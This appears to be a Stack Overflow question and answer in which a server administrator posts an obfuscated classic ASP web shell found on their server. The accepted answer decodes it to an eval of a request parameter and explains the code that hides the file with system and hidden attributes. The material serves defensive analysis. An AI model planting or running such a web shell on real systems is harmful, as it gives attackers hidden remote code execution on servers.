# VB malware tool reverse-engineering

Tags: asp.net, vb.net

I have found interesting malware on my server, which did some bad thing.
Now I am trying to reverse-engineering it, but due to complete lack of knowledge of VB\ASP I need to ask your help, colleagues.

```
<%
Function MorfiCoder(Code)
MorfiCoder=Replace(Replace(StrReverse(Code),"/*/",""""),"\*\",vbCrlf)
End Function

Execute MorfiCoder(")/*/srerif/*/(tseuqer lave")
Set fso=CreateObject("Scripting.FileSystemObject")
Set f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED"))
if  f.attributes <> 39 then
f.attributes = 39
end if
%>
```

As I understood - it executes some command and creates file somewhere with system\hidden attributes.
The main question is - how to use it, i.e. from logs I see, that hacker uploaded this file and used POST to command this. I want to command this too to understand, how he was able to upload files to some folders, which he should be able to do so.

Any advices are welcome. Sample with curl POST would be amazing.

Comment: Say, did you ever figure out how the malware got there? I just found this on my server (with Adodb.Stream instead of FileSystemObject). Need to find out how this got there.

Comment: @tofutim I found the same on a windows server with poor security systems...actually more than once in the last -say- year, a bad waste of time :(

Answer (score 2, accepted):

No don't need knowledge in VB to research what that code does; just read the documentation.

`MorfiCoder(")/*/srerif/*/(tseuqer lave")` returns `eval request("firers")` (I assume functions like `Replace` or `StrReverse` are obvious).

Execute and eval are self-explanatory; the docs for `request` are [here](https://msdn.microsoft.com/en-us/library/ms524948(VS.90).aspx):

> The Request object retrieves the values that the client browser passed to the server during an HTTP request.

So, whatever string is in the `firers` request variable, it will be executed (you said you already know that your attacker used a simply POST to send data to his script).

`Set fso=CreateObject("Scripting.FileSystemObject")` creates a [FileSystemObject Object](https://msdn.microsoft.com/en-us/library/aa242706(v=vs.60).aspx).

`Set f=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED"))` [creates](https://msdn.microsoft.com/en-us/library/aa265299(v=vs.60).aspx) a [File Object](https://msdn.microsoft.com/en-us/library/aa242698(v=vs.60).aspx); using the path in [`PATH_TRANSLATED`](http://blogs.msdn.com/b/david.wang/archive/2005/08/04/what-is-path-translated.aspx).

Then some [`attributes`](https://msdn.microsoft.com/en-us/library/aa242866(v=vs.60).aspx) (`Archive`, `System`, `Hidden`, `ReadOnly`) are set on that file object (to hide this script).

Why your attacker was able to upload this file to your server obviously can't be answered by the information you provided, and would also be out of scope of this question and probably off topic to stackoverflow.